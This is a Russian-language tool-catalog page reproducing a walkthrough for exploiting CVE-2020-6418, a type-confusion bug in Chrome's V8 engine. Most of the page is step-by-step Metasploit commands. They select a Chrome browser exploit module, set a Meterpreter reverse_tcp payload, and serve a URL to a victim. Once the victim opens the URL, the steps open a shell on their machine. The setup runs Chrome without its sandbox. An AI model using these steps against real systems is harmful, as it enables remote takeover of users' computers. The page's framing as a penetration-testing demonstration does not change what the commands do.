Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-6418 — Эксплойт для CVE-2020-6418, путаницы типов в V8, позволяющий удаленное выполнение кода через специально созданную HTML-страницу. Использует Metasploit для доставки полезной нагрузки reverse shell. | Kitploit
Инструменты/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Фреймворки для эксплойтовГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

Эксплойт для CVE-2020-6418, путаницы типов в V8, позволяющий удаленное выполнение кода через специально созданную HTML-страницу. Использует Metasploit для доставки полезной нагрузки reverse shell.

Репозиторий
1134 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-6418

CVE-2020-6418 касается путаницы типов (type confusion) в V8 в Google Chrome. Затрагиваемые версии — до 80.0.3987.122. Уязвимость позволяет удаленному злоумышленнику получить доступ к оболочке целевого устройства через специально созданную HTML-страницу.

Требования к окружению

  1. Google Chrome версии ниже 80.0.3987.122 .
root@kitploit:~
Примечание: Браузер Google Chrome должен запускаться без песочницы для успешной эксплуатации.
  1. Metasploit Framework
  2. ОС: любая

Настройка эксплойта

  1. Google Chrome версии v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

Настройка Google Chrome без песочницы

i) Создайте ярлык для Google Chrome
ii) Нажмите «Свойства» > перейдите к параметру «Объект»
iii) В конце строки EXE поставьте пробел и введите -no--sandbox
iv) Нажмите «Применить» > «ОК»
v) Откройте новый браузер Google Chrome, и вы увидите всплывающее окно с сообщением ниже.

root@kitploit:~
Вы используете неподдерживаемый флаг командной строки: -no-sandbox. Стабильность и безопасность пострадают.

Демонстрация отключения песочницы

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Использование Metasploit

Поскольку мы используем Kali в качестве среды для проведения атаки, Metasploit входит в состав дистрибутива. Но если вы используете другие дистрибутивы, необходимо настроить Metasploit перед началом эксплуатации.

Для дальнейшего понимания обратитесь к Установке Metasploit.

Проведение атаки

i) Запуск Metasploit Framework

root@kitploit:~
> msfconsole

ii) Поиск эксплойта

root@kitploit:~
> search chrome_js

iii) Используйте доступный эксплойт из вывода выше

root@kitploit:~
> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) Укажите IP-адрес SRVHOST

root@kitploit:~
> set SRVHOST <IP-адрес>

v) Укажите цель Здесь у нас два варианта:

  1. Цель 0: Windows
  2. Цель 1: Mac
root@kitploit:~
> set Target "Номер"

vi) Укажите полезную нагрузку

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) Для проверки текущих настроек и включенных параметров.

root@kitploit:~
> show options

viii) Для запуска эксплойта

root@kitploit:~
> run (или) > exploit

ix) Вы получите URL, который необходимо скопировать в браузер, чтобы сессия стала активной.

x) Как только пользователь перейдет по URL, будет создана сессия. Чтобы проверить это:

root@kitploit:~
> show sessions

xi) Используя сессию, мы можем проверить информацию о системе пользователя / войти в оболочку.

root@kitploit:~
> sessions <номер>
> shell

Демонстрация эксплуатации

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

Скачать инструмент